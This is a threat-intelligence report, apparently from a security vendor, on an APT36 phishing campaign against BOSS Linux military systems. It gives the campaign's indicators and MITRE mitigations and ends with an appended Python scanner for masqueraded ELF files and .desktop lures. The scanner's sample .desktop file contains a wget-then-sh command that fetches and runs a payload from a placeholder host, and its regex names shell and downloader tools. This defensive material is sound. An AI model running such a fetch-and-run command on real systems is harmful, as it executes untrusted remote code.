
Cyber Campaign Exploits BOSS Linux in Indian Military Systems
This cyber campaign targets Indian military systems running BOSS Linux through a sophisticated phishing-based malware attack. The attackers aim to infiltrate critical infrastructure by exploiting vulnerabilities in the open-source OS. Once inside, the malware enables unauthorized access, potential data exfiltration, and disruption of military operations. The campaign highlights growing threats to national defense networks and the need for stronger cybersecurity measures in Linux-based government systems.
Indicators of Compromise
Domains (2)
modgovindia.space
securestore.cv
Hashes (7)
IPv4 (1)
45.141.58.199
Notes
<div class="content-body">
<span class="content-title">CONCLUSION</span>
<p class="content-description">The phishing campaign targeting Indian military systems using BOSS Linux demonstrates a high-severity, espionage-driven threat orchestrated by the APT36 group. This operation combines social engineering, Linux-specific malware, and stealthy command-and-control techniques designed to infiltrate and maintain access to highly sensitive infrastructure.</p>
<p class="content-description">Given the sophistication of the malware, its ability to evade detection, and its targeting of national defense systems, this campaign highlights the urgent need for governments and critical sectors to adopt cybersecurity frameworks tailored to Linux environments.</p>
<p class="content-description">🛡️ How SOCRadar Helps</p>
<p class="content-description">Organizations can proactively detect, monitor, and mitigate such threats using SOCRadar’s integrated modules:</p>
<p class="content-description">🔍 1. Threat Intelligence Module</p>
<p class="content-description">• Tracks APT36 activities and related IoCs in real time.</p>
<p class="content-description">• Detects phishing infrastructure (like sorlastore[.]com) before it reaches users.</p>
<p class="content-description">• Provides contextual intelligence on ELF malware, Linux exploits, and attacker infrastructure.</p>
<p class="content-description">📩 2. Digital Risk Protection (DRP)</p>
<p class="content-description">• Monitors for phishing domains, spoofed emails, and fake government content targeting BOSS Linux users.</p>
<p class="content-description">• Identifies ZIP or .desktop files used in active phishing lures.</p>
<p class="content-description">• Alerts if your brand, organization, or email domains are being mimicked.</p>
<p class="content-description">🧠 3. Attack Surface Management (ASM)</p>
<p class="content-description">• Detects exposed BOSS Linux systems or misconfigured services within your infrastructure.</p>
<p class="content-description">• Helps prioritize patching of systems vulnerable to Linux-targeted malware.</p>
<p class="content-description">🛡️ 4. Threat Fusion &amp; Correlation</p>
<p class="content-description">• Correlates indicators such as malicious hashes, IPs, and domains with ongoing attack campaigns.</p>
<p class="content-description">• Maps threats to MITRE ATT&amp;CK to visualize attacker techniques (T1566, T1036, T1105, etc.).</p>
<p class="content-description">By leveraging SOCRadar’s modules, organizations can enhance visibility across their Linux-based environments, receive early warning of phishing and APT campaigns, and significantly reduce their exposure to state-sponsored cyber threats like the one targeting BOSS Linux.</p>
</div>
Mitigation
<div class="content-container">
<span class="content-title">T1036 - Masquerading</span>
<div align="left">
<table>
<colgroup> <col> <col> <col> </colgroup>
<tbody>
<tr> <th>ID</th> <th>Mitigation</th> <th>Description</th> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M1049">M1049</a></td> <td><a href="https://attack.mitre.org/mitigations/M1049">Antivirus/Antimalware</a></td> <td>Anti-virus can be used to automatically quarantine suspicious files.</td> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M1047">M1047</a></td> <td><a href="https://attack.mitre.org/mitigations/M1047">Audit</a></td> <td>Audit user accounts to ensure that each one has a defined purpose.</td> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M1040">M1040</a></td> <td><a href="https://attack.mitre.org/mitigations/M1040">Behavior Prevention on Endpoint</a></td> <td>Implement security controls on the endpoint, such as a Host Intrusion Prevention System (HIPS), to identify and prevent execution of potentially malicious files (such as those with mismatching file signatures).</td> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M1045">M1045</a></td> <td><a href="https://attack.mitre.org/mitigations/M1045">Code Signing</a></td> <td>Require signed binaries.</td> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M1038">M1038</a></td> <td><a href="https://attack.mitre.org/mitigations/M1038">Execution Prevention</a></td> <td>Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.</td> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M1022">M1022</a></td> <td><a href="https://attack.mitre.org/mitigations/M1022">Restrict File and Directory Permissions</a></td> <td>Use file system access controls to protect folders such as C:\Windows\System32.</td> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M1018">M1018</a></td> <td><a href="https://attack.mitre.org/mitigations/M1018">User Account Management</a></td> <td>Consider defining and enforcing a naming convention for user accounts to more easily spot generic account names that do not fit the typical schema.</td> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M1017">M1017</a></td> <td><a href="https://attack.mitre.org/mitigations/M1017">User Training</a></td> <td>Train users not to open email attachments or click unknown links (URLs). Such training fosters more secure habits within your organization and will limit many of the risks.</td> </tr>
</tbody>
</table>
</div>
<span class="content-title">T0853 - Scripting</span>
<div align="left">
<table>
<colgroup> <col> <col> <col> </colgroup>
<tbody>
<tr> <th>ID</th> <th>Mitigation</th> <th>Description</th> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M0948">M0948</a></td> <td><a href="https://attack.mitre.org/mitigations/M0948">Application Isolation and Sandboxing</a></td> <td>Consider the use of application isolation and sandboxing to restrict specific operating system interactions such as access through user accounts, services, system calls, registry, and network access. This may be even more useful in cases where the source of the executed script is unknown.</td> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M0942">M0942</a></td> <td><a href="https://attack.mitre.org/mitigations/M0942">Disable or Remove Feature or Program</a></td> <td>Consider removal or disabling of programs and features which may be used to run malicious scripts (e.g., scripting language IDEs, PowerShell, Visual Studio).</td> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M0938">M0938</a></td> <td><a href="https://attack.mitre.org/mitigations/M0938">Execution Prevention</a></td> <td>Execution prevention may prevent malicious scripts from accessing protected resources.</td> </tr>
</tbody>
</table>
</div>
<span class="content-title">T1071 - Application Layer Protocol</span>
<div align="left">
<table>
<colgroup> <col> <col> <col> </colgroup>
<tbody>
<tr> <th>ID</th> <th>Mitigation</th> <th>Description</th> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M1037">M1037</a></td> <td><a href="https://attack.mitre.org/mitigations/M1037">Filter Network Traffic</a></td> <td>Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.</td> </tr>
</tbody>
</table>
</div>
<span class="content-title">T1095 - Non-Application Layer Protocol</span>
<div align="left">
<table>
<colgroup> <col> <col> <col> </colgroup>
<tbody>
<tr> <th>ID</th> <th>Mitigation</th> <th>Description</th> </tr>
<tr> <td><a href="https://attack.mitre.org/mitigations/M1047">M1047</a></td> <td><a href="https://attack.mitre.org/mitigations/M1047">Audit</a></td> <td>Periodically investigate ESXi hosts for open VMCI ports. Running the <code>lsof -A</code> command and inspecting results with a type of <code>SOCKET_VMCI</code> will reveal processes that have open VMCI ports. <a href="https://cloud.google.com/blog/topics/threat-intelligence/vmware-detection-containment-hardening">[102]</a></td> </tr>
</tbody>
</table>
</div>
</div>
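The T1036 Masquerading row above (blocking files with mismatching file signatures) and the ZIP/.desktop lures the notes describe translate into a simple host-side check. The following is an added example, not code from the original report or from SOCRadar: it flags ELF binaries hiding behind document extensions and .desktop launchers whose Exec= line runs a shell or downloader. The sample files, file names and the placeholder URL are all constructed for the demonstration.

```python
"""Added example, not from the original report: flag T1036-style lures on Linux hosts.
Check 1: a document-named file (.pdf, .jpg ...) whose body starts with the ELF magic.
Check 2: a .desktop launcher whose Exec= runs a shell or downloader (the ZIP/.desktop
lure pattern). Samples are constructed in a temp dir; the URL is a placeholder."""
import os
import re
import tempfile

ELF_MAGIC = b"\x7fELF"
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}
SUSPICIOUS_EXEC = re.compile(r"\b(sh|bash|python3?|perl|curl|wget|base64|chmod)\b")  # shells, downloaders

def check_magic(path):
    """Finding if the name says document but the magic bytes say ELF, else None."""
    with open(path, "rb") as fh:
        head = fh.read(4)
    ext = os.path.splitext(path)[1].lower()
    return f"{path}: ELF binary masquerading as {ext} file" if head == ELF_MAGIC and ext in DOCUMENT_EXTS else None

def check_desktop(path):
    """Finding if a .desktop launcher's Exec= invokes a shell/downloader, else None."""
    if not path.lower().endswith(".desktop"):
        return None
    with open(path, "r", errors="replace") as fh:
        execs = [line[5:].strip() for line in fh if line.startswith("Exec=")]
    hits = [e for e in execs if SUSPICIOUS_EXEC.search(e)]
    return f"{path}: .desktop launcher runs {hits[0]!r}" if hits else None

def scan_dir(root):
    """Walk `root` and return every finding from both checks, in name order."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            path = os.path.join(dirpath, name)
            findings += [hit for hit in (check_magic(path), check_desktop(path)) if hit]
    return findings

def build_samples():
    """Constructed samples: a genuine PDF header, an ELF named .pdf, a .desktop lure."""
    d = tempfile.mkdtemp(prefix="lure-scan-")
    samples = {
        "report.pdf": b"%PDF-1.4\n",
        "Advisory.pdf": ELF_MAGIC + b"\x02\x01\x01" + bytes(9),
        "Advisory.desktop": b"[Desktop Entry]\nType=Application\nName=Advisory\n"
                            b'Exec=bash -c "wget -q http://placeholder.invalid/p -O /tmp/p; sh /tmp/p"\n',
    }
    for name, body in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(body)
    return d
```

Running `scan_dir(build_samples())` reports the ELF named Advisory.pdf and the Advisory.desktop launcher while leaving the genuine report.pdf alone; pointing `scan_dir` at a user's Downloads or Desktop directory applies the same checks to real files.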